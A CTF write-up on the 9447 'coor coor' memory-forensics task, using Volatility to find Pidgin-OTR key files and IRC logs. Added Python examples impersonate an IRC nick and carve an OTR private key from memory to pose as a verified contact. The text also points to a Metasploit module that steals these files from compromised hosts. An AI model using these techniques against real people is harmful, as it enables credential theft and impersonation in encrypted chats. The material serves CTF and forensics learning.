The Australian 9447 Security Society CTF took place on November 29-30 and it was yet another fun and really professionally organized CTF. I played with my friends from TheGoonies once again (The Goonies 'R' Good Enough, right?).
I found the task "coor coor" particularly interesting: it was a good way to practice some concepts from the new book I recently bought: The Art of Memory Forensics (authored by @attrc and @gleeda).
Task: coor coor (misc - 400)
A 9447 CTF organizer is giving away flags to friends that he trusts. This memory dump was taken off a competitor's computer after a raid by the pwnpolice.
Download provided: https://s3-us-west-2.amazonaws.com/elasticbeanstalk-us-west-2-467703568171/challenges/coorcoor.tar.bz2
Let's start by identifying the Operating System profile:
python vol.py -f challenge.vmem imageinfo
Let's take screenshots of the desktops to see what the user was doing:
python vol.py -f challenge.vmem screenshot -D screenshot/
The user was running something inside VirtualBox. Let's keep digging:
python vol.py -f challenge.vmem psxview
python vol.py -f challenge.vmem filescan | grep -e "\.tc\|TrueCrypt"
python vol.py -f challenge.vmem connscan
The host 54.149.24.114 (yodawg.9447.plumbing) happened to be an IRC server with only one active channel: #9447ctf. We can carve some pidgin logs using foremost:
python vol.py -f challenge.vmem mftparser | grep 9447ctf
foremost challenge.vmem
Pidgin-OTR disables logging of OTR conversations by default, so there are no plaintext logs of the private chats. We can, however, see a couple of OTR-encrypted messages in the memory dump:
OTR provides perfect forward secrecy: even if the long-term private key is lost, previously recorded conversations are not compromised. All I had was the long-term DSA signing key (otr.private_key), and that key is never used to encrypt conversations; it only signs the Diffie-Hellman exchange that produces the per-session encryption keys. To decrypt the captured messages I still needed to retrieve the ephemeral (short-term) session keys from memory. I got stuck on this phase and spent the whole night trying to figure out how to do that.
After some time I decided to get some sleep and keep trying it on the following day. The first thing I did the next day was to re-read the challenge description and I quickly figured it out:
"A 9447 CTF organizer is giving away flags to friends that he trusts." IRC does not authenticate nicknames on its own, so I could simply connect to the IRC server (yodawg.9447.plumbing:6667) as testicool69 (the trusted friend) and message acidburn88 (the CTF admin) asking for the flag. So how do I do that?
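The IRC side of the exchange, as an added example that is not part of the original writeup: the wire lines a client sends to register under someone else's nick, the PING/PONG keepalive, and the private message to the admin. The client logic is separated from the socket so the conversation can be replayed offline; the server name and port come from the writeup, the nick and message contents are constructed. Note that acidburn88's reply arrives as an OTR handshake, which is exactly why the stolen OTR key still has to be loaded into Pidgin; this script only covers the unauthenticated-nick part.

```python
import socket

SERVER, PORT = "yodawg.9447.plumbing", 6667   # server named in the writeup


class IrcImpersonator:
    """Minimal IRC client logic. Registering with NICK/USER is all the
    protocol asks for: nothing proves you are the usual owner of the nick."""

    def __init__(self, nick, target, message):
        self.nick, self.target, self.message = nick, target, message
        self.registered, self.error = False, None
        self.inbox = []            # (sender, text) of private messages received
        self.outbox = [f"NICK {nick}", f"USER {nick} 0 * :{nick}"]

    def drain(self):
        """Return and clear the lines waiting to be sent."""
        out, self.outbox = self.outbox, []
        return out

    def feed(self, line):
        """Handle one server line (CRLF optional); return lines to send now."""
        parts = line.rstrip("\r\n").split(" ")
        prefix = parts.pop(0)[1:] if parts and parts[0].startswith(":") else ""
        cmd = parts[0] if parts else ""
        if cmd == "PING":                              # answer or get dropped
            self.outbox.append("PONG " + " ".join(parts[1:]))
        elif cmd == "001" and not self.registered:     # RPL_WELCOME: we are in
            self.registered = True
            self.outbox.append(f"PRIVMSG {self.target} :{self.message}")
        elif cmd == "433":                             # ERR_NICKNAMEINUSE: the
            self.error = "nick in use"                 # real user is online
        elif cmd == "PRIVMSG" and len(parts) >= 3:
            sender = prefix.split("!", 1)[0]
            self.inbox.append((sender, " ".join(parts[2:])[1:]))  # drop ':'
        return self.drain()


def run(nick, target, message, host=SERVER, port=PORT, timeout=60):
    """Drive the state machine over a real TCP connection (not run here)."""
    s = IrcImpersonator(nick, target, message)
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall("".join(l + "\r\n" for l in s.drain()).encode())
        buf = b""
        while not s.inbox and not s.error:
            chunk = sock.recv(4096)
            if not chunk:
                break
            buf += chunk
            while b"\r\n" in buf:
                line, buf = buf.split(b"\r\n", 1)
                for out in s.feed(line.decode("utf-8", "replace")):
                    sock.sendall((out + "\r\n").encode())
    return s.inbox, s.error
```

A 433 reply means the genuine testicool69 is still connected; on a server without services enforcing nick ownership, that is the only thing standing between you and his identity.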
Pidgin-OTR keeps its state in three files under the Pidgin data directory (%APPDATA%\.purple on Windows): otr.private_key (the long-term DSA key), otr.instance_tags and otr.fingerprints (the fingerprints of contacts and their trust status). I searched the memory dump for the string "prpl-irc" (the libpurple protocol id for IRC, which appears in those files), extracted the files and dropped them over the ones in my own Pidgin installation. There's a Metasploit post-module that retrieves these files from a live (compromised) system, by the way...
Since the OTR fingerprint is just a hash of the public key, loading his private key made my client present testicool69's fingerprint, which acidburn88 had already marked as trusted, and I got the secret flag:
9447{forensics_champ!}
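The key-recovery step above, as an added example that is not part of the original writeup: carve the libotr otr.private_key s-expression out of a raw memory image, parse the DSA parameters, and derive the OTR fingerprint (SHA-1 over the byte-level public key: a 2-byte type 0x0000 for DSA followed by p, q, g and y as length-prefixed MPIs, per the OTR protocol specification) so you can check it against an otr.fingerprints file before bothering to load it into Pidgin. The key blob, the "memory dump" and the fingerprints file are constructed toy data with tiny DSA numbers, not the challenge's material; the tab-separated layout assumed for otr.fingerprints is noted as an assumption in the code.

```python
import hashlib
import re

# Constructed sample: an otr.private_key in the s-expression form libotr
# writes. The DSA numbers are toy values chosen for readability, not a key.
SAMPLE_PRIVKEY = (b'(privkeys\n (account\n(name "testicool69")\n(protocol prpl-irc)\n'
                  b'(private-key\n (dsa\n  (p #E3D2B1A0FF#)\n  (q #8C7B6A#)\n  (g #02#)\n'
                  b'  (y #D9C8B7A696#)\n  (x #1F2E3D#)\n  )\n )\n )\n)')

# Constructed stand-in for the memory image: the blob sits between unrelated
# bytes and is followed by a truncated copy that the carver has to skip.
SAMPLE_DUMP = (b"\x00" * 64 + b"accounts.xml junk " + SAMPLE_PRIVKEY
               + b"\xff" * 32 + b"(privkeys truncated")


def carve_sexps(dump, start=b"(privkeys"):
    """Yield every parenthesis-balanced s-expression beginning with `start`.
    Parentheses inside double-quoted strings (e.g. an account name) are
    ignored; a blob that never balances is dropped as truncated."""
    pos = 0
    while True:
        begin = dump.find(start, pos)
        if begin == -1:
            return
        depth, in_str, i = 0, False, begin
        while i < len(dump):
            c = dump[i:i + 1]
            if in_str:
                if c == b"\\":
                    i += 1                  # skip the escaped character
                elif c == b'"':
                    in_str = False
            elif c == b'"':
                in_str = True
            elif c == b"(":
                depth += 1
            elif c == b")":
                depth -= 1
                if depth == 0:
                    yield dump[begin:i + 1]
                    break
            i += 1
        else:
            return                          # ran off the end: truncated blob
        pos = i + 1


def parse_privkey(blob):
    """Pull account name, protocol and the DSA parameters out of one blob."""
    text = blob.decode("ascii", "replace")
    name = re.search(r'\(name\s+"((?:[^"\\]|\\.)*)"\s*\)', text)
    proto = re.search(r'\(protocol\s+([^\s()]+)\s*\)', text)
    nums = {m.group(1): int(m.group(2), 16) for m in
            re.finditer(r'\((p|q|g|y|x)\s+#([0-9A-Fa-f]+)#\s*\)', text)}
    if not name or not proto or {"p", "q", "g", "y", "x"} - nums.keys():
        raise ValueError("incomplete libotr private key s-expression")
    return {"name": name.group(1), "protocol": proto.group(1), **nums}


def encode_mpi(n):
    """OTR MPI: 4-byte big-endian length, then the minimal big-endian magnitude."""
    body = n.to_bytes((n.bit_length() + 7) // 8, "big") if n else b""
    return len(body).to_bytes(4, "big") + body


def dsa_pubkey_bytes(p, q, g, y):
    """Byte-level OTR public key: type 0x0000 (DSA) then p, q, g, y as MPIs."""
    return b"\x00\x00" + b"".join(encode_mpi(v) for v in (p, q, g, y))


def otr_fingerprint(key):
    """SHA-1 of the public key bytes, shown as Pidgin does: 5 groups of 8 hex."""
    digest = hashlib.sha1(dsa_pubkey_bytes(
        key["p"], key["q"], key["g"], key["y"])).hexdigest().upper()
    return " ".join(digest[i:i + 8] for i in range(0, 40, 8))


def find_trust_entry(fingerprints_text, fp):
    """Look a fingerprint up in an otr.fingerprints file. Assumed layout:
    nick, account, protocol, 40 hex digits, trust level, tab separated."""
    wanted = fp.replace(" ", "").lower()
    for line in fingerprints_text.splitlines():
        f = line.split("\t")
        if len(f) >= 4 and f[3].lower() == wanted:
            return {"nick": f[0], "account": f[1], "protocol": f[2],
                    "trust": f[4] if len(f) > 4 else ""}
    return None


# Constructed otr.fingerprints as the admin's side would hold it: the
# competitor's key recorded as verified.
SAMPLE_FINGERPRINTS = "\t".join([
    "testicool69", "acidburn88", "prpl-irc",
    otr_fingerprint(parse_privkey(SAMPLE_PRIVKEY)).replace(" ", "").lower(),
    "verified"]) + "\n"
```

Run `carve_sexps` over the real image bytes instead of SAMPLE_DUMP; each blob that parses cleanly is a complete otr.private_key you can write out, and `otr_fingerprint` tells you which trusted contact it will impersonate without starting Pidgin. The fingerprint depends only on the public half, so anyone holding the private key presents the same, already-verified fingerprint: the whole reason the raid on the competitor's machine was enough.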
Nice writeup, Thanks Bernardo!